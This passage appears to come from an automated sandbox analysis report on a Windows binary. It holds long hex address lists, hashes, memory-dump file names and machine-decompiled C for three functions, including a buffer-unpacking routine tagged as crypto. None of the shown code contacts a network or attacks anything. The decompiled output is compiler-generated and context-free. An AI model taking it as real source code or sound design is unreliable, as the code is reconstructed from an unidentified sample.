0x0083867a
0x00838680
0x00838686
0x0083868a
0x0083868a
0x0083868a
0x0083868a
0x0083861c
0x0083861f
0x00838625
0x00838627
0x00838629
0x0083862d
0x0083862f
0x00838636
0x0083863b
0x0083863c
0x00838643
0x00838648
0x00838652
0x00838654
0x0083866a
0x00838656
0x00838658
0x0083865f
0x00838661
0x00838661
0x00838654
0x0083862d
0x00838627
0x00838693
0x00838698
0x008386b0
0x008386ba
0x008386bd
0x008386bf
0x008386c3
0x008386c6
0x008386c9
0x008386cc
0x008386e4
0x008386e7
0x008386ec
0x008386f2
0x008386f3
0x008386f5
0x008386fe
0x008386fe
0x00838700
0x00838703
0x0083870d
0x00838714
0x00838719
0x0083871b
0x008390da
0x008390da
0x0083853a
0x0083853b
0x00838540
0x0083854a
0x0083854a
0x0083872f
0x00838732
0x0083873a
0x00838741
0x00838744
0x0083875b
0x0083875b
0x0083875e
0x0083875e
0x00838763
0x00838766
0x0083876d
0x0083876e
0x00838771
0x00838774
0x0083877f
0x0083877f
0x00838782
0x00838789
0x00838789
0x0083878f
0x00838796
0x00838797
0x008387a5
0x008387aa
0x008387ac
0x008387e4
0x008387e7
0x008387f3
0x008387f3
0x008387f3
0x008387f6
0x008387f6
0x00838800
0x00838805
0x00838807
0x0083882b
0x0083882b
0x00838832
0x00000000
0x00000000
0x00838834
0x0083883e
0x00838843
0x00838845
0x00838924
0x00000000
0x00838924
0x0083884b
0x0083884e
0x0083885c
0x0083885d
0x0083885d
0x0083885f
0x00838868
0x0083886b
0x00838877
0x0083888a
0x00838894
0x008388a6
0x008388ab
0x008388b2
0x00838948
0x00838948
0x0083894c
0x00838952
0x00838957
0x0083895d
0x00838962
0x00838968
0x0083896f
0x00838974
0x00838975
0x00838977
0x00838a0a
0x00838a0c
0x00838a11
0x00838a13
0x00838a65
0x00838a68
0x00838a6a
0x00838a8e
0x00838a91
0x00838a91
0x00838a98
0x00838ad0
0x00838ad2
0x0083908f
0x0083908f
0x00839093
0x00839099
0x0083909e
0x008390a2
0x008390a5
0x008390a8
0x008390aa
0x008390aa
0x008390aa
0x008390aa
0x008390b0
0x008390b0
0x008390b4
0x00000000
0x00000000
0x008390b6
0x008390b8
0x00838538
0x00838538
0x00000000
0x00838538
0x008390be
0x008390c4
0x008390d2
0x008390d4
0x00000000
0x00000000
0x00000000
0x008390d4
0x008390c6
0x008390c8
0x00000000
0x008390c8
0x00838ad8
0x00838ad8
0x00838adb
0x00838ae2
0x00838af4
0x00838af4
0x00838af7
0x00838af9
0x00838b40
0x00838b40
0x00838b44
0x00838b46
0x00838b4e
0x00838b4e
0x00838b62
0x00838b68
0x00838b6e
0x00838b74
0x00838b85
0x00838b9b
0x00838ba6
0x00838baf
0x00838bb2
0x00838bb9
0x00838bbf
0x00838bc4
0x00838bc7
0x00838bc9
0x00838bcc
0x00838bcf
0x00838bd2
0x00838bd5
0x00838bd8
0x00838bda
0x00838c7d
0x00838c7d
0x00838c80
0x00838c87
0x00838c8e
0x00838c92
0x00838ca8
0x00838caa
0x00838caa
0x00838cab
0x00838cab
0x00838caf
0x00838cb2
0x00838cb5
0x00838cb8
0x00838dc4
0x00838dcb
0x00838dcd
0x00838dd4
0x00838dfe
0x00838e03
0x00838e15
0x00838e1b
0x00838e1d
0x00838e23
0x00838e3d
0x00838dd6
0x00838dd6
0x00838ddc
0x00838de2
0x00838de3
0x00838de3
0x00838dd4
0x00838e42
0x00838e44
0x00838e49
0x00838e50
0x00838e82
0x00838e82
0x00838e82
0x00838e84
0x00838e86
0x00838e86
0x00838e8d
0x00838e97
0x00838e9e
0x00838ebd
0x00838ebd
0x00838ec1
0x00838ec4
0x00838f25
0x00838f25
0x00838f29
0x00838f2c
0x00838f3f
0x00838f3f
0x00838f3f
0x00838f41
0x00838f41
0x00838f45
0x00000000
0x00000000
0x00838f4b
0x00838f4e
0x00838f52
0x00838f5e
0x00838f5e
0x00838f62
0x00838f7d
0x00838f7d
0x00838f7f
0x00838f94
0x00838f94
0x00838f96
0x0083905a
0x0083905a
0x0083905d
0x00839064
0x0083906c
0x00839073
0x00839078
0x0083907a
0x00839083
0x00839083
0x0083907a
0x00839088
0x00000000
0x00839088
0x00838f9c
0x00838fa1
0x00838fa3
0x00838fa6
0x00838fac
0x00838fac
0x00838fae
0x00838fc0
0x00838fc0
0x00838fc6
0x00838fcb
0x00838fd4
0x00838fe8
0x00838fef
0x00839002
0x00839004
0x0083900d
0x00839012
0x00839018
0x00839027
0x0083903a
0x0083904d
0x0083904f
0x00839052
0x00839057
0x00000000
0x00839057
0x00838fb0
0x00838fb6
0x00000000
0x00000000
0x00838fb8
0x00838fbe
0x00000000
0x00000000
0x00000000
0x00838fbe
0x00838fa8
0x00838faa
0x00000000
0x00000000
0x00000000
0x00838faa
0x00838f81
0x00838f84
0x00838f8b
0x00000000
0x00000000
0x00838f91
0x00000000
0x00838f91
0x00838f64
0x00838f66
0x00000000
0x00000000
0x00838f68
0x00838f6f
0x00000000
0x00000000
0x00838f75
0x00838f77
0x00000000
0x00000000
0x00000000
0x00838f77
0x00838f54
0x00838f58
0x00000000
0x00000000
0x00000000
0x00838f58
0x00838f2e
0x00838f35
0x00000000
0x00000000
0x00838f37
0x00838f39
0x00000000
0x00000000
0x00838f3b
0x00000000
0x00838f3b
0x00838ec6
0x00838eca
0x00000000
0x00000000
0x00838ecc
0x00838ece
0x00000000
0x00000000
0x00838ed0
0x00838ed6
0x00838f00
0x00838f00
0x00838f0a
0x00838f0b
0x00838f0d
0x00838f0d
0x00838f19
0x00838f1d
0x00838f22
0x00000000
0x00838f22
0x00838ed8
0x00838ede
0x00838ee8
0x00838ee8
0x00838eef
0x00000000
0x00000000
0x00838ef1
0x00838efb
0x00838efc
0x00000000
0x00838efc
0x00838ee0
0x00838ee6
0x00000000
0x00000000
0x00000000
0x00838ee6
0x00838ea0
0x00838ea6
0x00000000
0x00000000
0x00838ea8
0x00838eb2
0x00838eb2
0x00838eb4
0x00838eb6
0x00838eb6
0x00000000
0x00838eb4
0x00838eaa
0x00838eb0
0x00000000
0x00000000
0x00000000
0x00838eb0
0x00838e8f
0x00000000
0x00838e8f
0x00838e67
0x00838e73
0x00838e78
0x00838e7a
0x00000000
0x00000000
0x00838e7c
0x00838e7e
0x00000000
0x00838e7e
0x00838cbe
0x00838cc4
0x00838cc7
0x00838d30
0x00838d35
0x00838d46
0x00838d4b
0x00838d4e
0x00838d50
0x00838d9d
0x00838d9d
0x00838da0
0x00838da0
0x00838da7
0x00838cfc
0x00838cfc
0x00838cfe
0x00838dba
0x00838dba
0x00838dba
0x00838dbc
0x00838dbc
0x00000000
0x00838dbc
0x00838d04
0x00838d04
0x00838d06
0x00000000
0x00000000
0x00838d0e
0x00000000
0x00838d0e
0x00838dad
0x00838daf
0x00000000
0x00000000
0x00838cf8
0x00838cf8
0x00000000
0x00838cf8
0x00838d52
0x00838d5a
0x00000000
0x00000000
0x00838d5c
0x00838d62
0x00838d6e
0x00838d6f
0x00838d72
0x00838d80
0x00838d81
0x00838d88
0x00838d74
0x00838d74
0x00838d74
0x00838d8d
0x00838d8d
0x00838d90
0x00838d92
0x00838cf5
0x00838cf5
0x00000000
0x00838cf5
0x00838d98
0x00000000
0x00838d98
0x00838cc9
0x00838ccc
0x00000000
0x00000000
0x00838cce
0x00838cd0
0x00838d14
0x00838d14
0x00838d16
0x00000000
0x00000000
0x00838d22
0x00838d29
0x00000000
0x00838d29
0x00838cd2
0x00838cd5
0x00000000
0x00000000
0x00838cd7
0x00838cda
0x00000000
0x00000000
0x00838ce9
0x00838cee
0x00838cf0
0x00838cf2
0x00000000
0x00838cf2
0x00838c94
0x00838c96
0x00000000
0x00000000
0x00838c9a
0x00838c9b
0x00838c9f
0x00000000
0x00000000
0x00838ca3
0x00838ca4
0x00000000
0x00838ca4
0x00838be0
0x00838be6
0x00000000
0x00000000
0x00838bec
0x00838bf2
0x00838bf8
0x00838bfa
0x00838c7a
0x00838c7a
0x00000000
0x00838c7a
0x00838bfc
0x00838c06
0x00838c06
0x00838c16
0x00838c19
0x00838c1b
0x00838c75
0x00838c75
0x00838c78
0x00838c78
0x00000000
0x00838c78
0x00838c1d
0x00838c23
0x00838c25
0x00838c27
0x00838c4c
0x00838c52
0x00838c5e
0x00838c69
0x00838c72
0x00000000
0x00838c72
0x00838c29
0x00838c33
0x00838c35
0x00838c3a
0x00838c40
0x00000000
0x00000000
0x00838c42
0x00000000
0x00000000
0x00838c44
0x00838c4a
0x00000000
0x00000000
0x00000000
0x00838c4a
0x00838c2b
0x00838c31
0x00000000
0x00000000
0x00000000
0x00838c31
0x00838c1f
0x00838c21
0x00000000
0x00000000
0x00000000
0x00838c21
0x00838bfe
0x00838c04
0x00000000
0x00000000
0x00000000
0x00838c04
0x00838b48
0x00838b48
0x00838b48
0x00838b48
0x00000000
0x00838b48
0x00838aff
0x00838b02
0x00838b03
0x00838b06
0x00838b08
0x00838b13
0x00838b15
0x00838b24
0x00838b36
0x00838b36
0x00838b15
0x00000000
0x00838b06
0x00838ae4
0x00838aeb
0x00838af2
0x00838b3d
0x00000000
0x00838b3d
0x00000000
0x00838af2
0x00838a9e
0x00838aa1
0x00838aa8
0x00838aaf
0x00838ab4
0x00838ab6
0x00000000
0x00000000
0x00838ab8
0x00838aba
0x00838abd
0x00838abd
0x00838ac3
0x00838ac8
0x00000000
0x00838ac8
0x00838a6c
0x00838a75
0x00838a76
0x00838a7b
0x00838a7e
0x00838a80
0x00838a88
0x00838a88
0x00838a8a
0x00000000
0x00000000
0x00000000
0x00838a8c
0x00838a15
0x00838a19
0x00838a1f
0x00838a22
0x00838a26
0x00838a2e
0x00838a2f
0x00838a32
0x00838a3a
0x00838a3b
0x00838a3e
0x00838a40
0x00838a46
0x00838a4c
0x00838a4e
0x00838a54
0x00838a5b
0x00838a5e
0x00838a5e
0x00838a4c
0x00838a3e
0x00838a32
0x00838a26
0x00000000
0x00838a19
0x0083897d
0x00838980
0x00000000
0x00000000
0x00838986
0x00838989
0x0083898c
0x0083898e
0x00000000
0x00000000
0x00838994
0x00838997
0x00000000
0x00000000
0x0083899d
0x008389a0
0x008389a7
0x00000000
0x00000000
0x008389af
0x008389b9
0x008389be
0x008389c0
0x008389f7
0x008389f7
0x008389fb
0x00838a85
0x00000000
0x00838a85
0x00838a01
0x00838a03
0x00838a05
0x00000000
0x00838a05
0x008389c2
0x008389c6
0x00000000
0x00000000
0x008389c8
0x008389d0
0x008389d1
0x008389d8
0x008389f2
0x00000000
0x008389f2
0x008388b8
0x008388bf
0x00000000
0x00000000
0x008388c7
0x008388d2
0x008388d7
0x008388da
0x008388dc
0x00000000
0x00000000
0x008388de
0x008388e5
0x00000000
0x00000000
0x008388e7
0x008388ee
0x008388f8
0x008388f9
0x00838930
0x00838932
0x0083893e
0x00838943
0x00838945
0x00000000
0x00838945
0x008388fb
0x008388fd
0x0083890b
0x00838910
0x00838914
0x0083891a
0x0083891a
0x0083882b
0x00838810
0x00838817
0x0083881c
0x00838823
0x00000000
0x00838823
0x008387b5
0x008387bb
0x008387c0
0x008387c2
0x00000000
0x00000000
0x008387c4
0x008387cb
0x008387dd
0x008387df
0x00000000
0x008387df
0x008387ce
0x008387d4
0x008387d9
0x008387db
0x00000000
0x00000000
0x00000000
0x008387db
0x00838784
0x00838787
0x00000000
0x00000000
0x00000000
0x00838787
0x00838776
0x0083877d
0x00000000
0x00000000
0x00000000
0x0083877d
0x00838746
0x0083874d
0x00000000
0x00000000
0x0083874f
0x00838753
0x00838759
0x00000000
0x00000000
0x00000000
0x00838759
0x008386f7
0x008386fa
0x008386fc
0x00000000
0x00000000
0x00000000
0x008386fc
0x008386ce
0x008386d4
0x008386d7
0x008386da
0x008386dc
0x00000000
0x008386e2
0x008386e2
0x008386e2
0x00000000
0x008386e2
0x008386dc
0x008385a0
0x008385a6
0x00000000
0x00000000
0x008385a8
0x008385af
0x00000000
0x00000000
0x00000000
0x008385af
0x00838579
0x00838583
0x00838583
0x00838589
0x00000000
0x00838589
0x0083857b
0x00838581
0x00000000
0x00000000
0x00000000
0x00838581
0x0083855b
0x00838565
0x00838565
0x0083856b
0x00000000
0x0083856b
0x0083855d
0x00838563
0x00000000
0x00000000
0x00000000
0x00838563
0x008384c4
0x008384c7
0x008384e6
0x008384e6
0x008384e9
0x00000000
0x00000000
0x008384ef
0x008384f6
0x00000000
0x00000000
0x00838501
0x00838502
0x00838506
0x00838507
0x00838508
0x0083850d
0x0083850f
0x00838524
0x00838535
0x00000000
0x00838511
0x00838518
0x00000000
0x00838518
0x0083850f
0x008384c9
0x008384d0
0x00000000
0x008384d6
0x008384e1
0x00000000
0x008384e1
0x008384d0
0x0083848d
0x008384ab
0x008384ab
0x00000000
0x008384ab
0x0083848f
0x00838490
0x00838494
0x00838495
0x0083849d
0x008384b2
0x008384b2
0x00000000
0x0083849f
0x008384a6
0x00000000
0x008384a6

APIs

__EH_prolog.LIBCMT ref: 0083845D
_memcmp.LIBVCRUNTIME ref: 008388D2

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 6dab1485a852a0749c35923a51660546f5b517524609ebfdb272bdfb725a2dbb
Instruction ID: d199d99d1aa96e8695b0a8836020b920296042690b8a3d8b6863285a0dd7ac5f
Opcode Fuzzy Hash: 6dab1485a852a0749c35923a51660546f5b517524609ebfdb272bdfb725a2dbb
Instruction Fuzzy Hash: 7982E670904285EEDF15DF64C485BEABBA9FF95300F0840BAF849DB142DB719A85CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0084E643, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084E643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0084E64F); // executed
				return _t1;
			}

0x0084e648
0x0084e64e

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,0084E0C4), ref: 0084E648

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 97da637b9e4552faaf0851ec6dc8fb0c8aed8ed1720061614cf43bbee8b3027e
Instruction ID: f696319c0f9db86b78e551ea04402b20da2dbd6af61be6c50d621b22c8c24c61
Opcode Fuzzy Hash: 97da637b9e4552faaf0851ec6dc8fb0c8aed8ed1720061614cf43bbee8b3027e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 008462E0, Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E008462E0(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00842AF2(__ecx, __edx); // executed
				E0084434B(__ecx,  *((intOrPtr*)(_t274 + 0x138)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E0084EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E0083C7AC();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E0083A54E(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00843446(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00840474( *((intOrPtr*)(_t216 + 0x14)), E00846D1F, _t232);
											} else {
												E00846715(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E008406B1( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00846D4E(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00842E9F(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00850E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E0084EA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00850E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E0084484D(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E0084EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x008462ea
0x008462ec
0x008462fa
0x00846302
0x00846306
0x00846308
0x0084630a
0x0084630a
0x0084630d
0x00846313
0x00846314
0x00846319
0x00846323
0x0084630a
0x00846332
0x00846342
0x0084634b
0x00846352
0x00846355
0x00846357
0x0084635b
0x0084635d
0x00846361
0x00846365
0x00846369
0x00846369
0x00846375
0x0084637b
0x0084637c
0x00846381
0x00846387
0x00000000
0x00000000
0x0084638d
0x0084638f
0x00846393
0x0084639b
0x00000000
0x008463a1
0x008463a7
0x00000000
0x008465fd
0x008463b1
0x008463b3
0x008463b7
0x008463bb
0x008463bb
0x008463bd
0x008463c3
0x008463c7
0x008463c7
0x008463c9
0x008463cc
0x008463ce
0x008463d2
0x008463d9
0x008463db
0x008463ee
0x008463f3
0x008463fb
0x008463fe
0x008463fe
0x00846402
0x00846405
0x0084640b
0x00846411
0x00846417
0x0084641a
0x0084641d
0x00000000
0x0084641d
0x008463dd
0x008463dd
0x00846421
0x00846421
0x00846426
0x00846430
0x00846436
0x0084643a
0x00846440
0x00846473
0x00846473
0x00846478
0x00846489
0x00846489
0x00846490
0x0084647a
0x0084647a
0x00846481
0x00000000
0x00846483
0x00846483
0x00846483
0x00846481
0x00846498
0x008464a5
0x008464a7
0x008464aa
0x008464ae
0x008464ae
0x008464b0
0x008464b4
0x008464bc
0x008464bc
0x008464c1
0x00000000
0x00000000
0x008464b6
0x008464b6
0x008464ba
0x00000000
0x00000000
0x008464ba
0x00846442
0x00846445
0x00846449
0x0084644f
0x00846450
0x00846455
0x00846457
0x008464d2
0x008464d2
0x00846459
0x00846459
0x0084645d
0x00846468
0x00846468
0x0084646c
0x00000000
0x0084645f
0x0084645f
0x00846466
0x00000000
0x00000000
0x00000000
0x00000000
0x00846466
0x0084645d
0x00846457
0x00846440
0x00000000
0x008464c3
0x008464c6
0x008464c8
0x008464c8
0x008464d0
0x008464d7
0x008464d7
0x008464dd
0x008464e2
0x008464e4
0x008464e6
0x008464e8
0x008464e8
0x008464e8
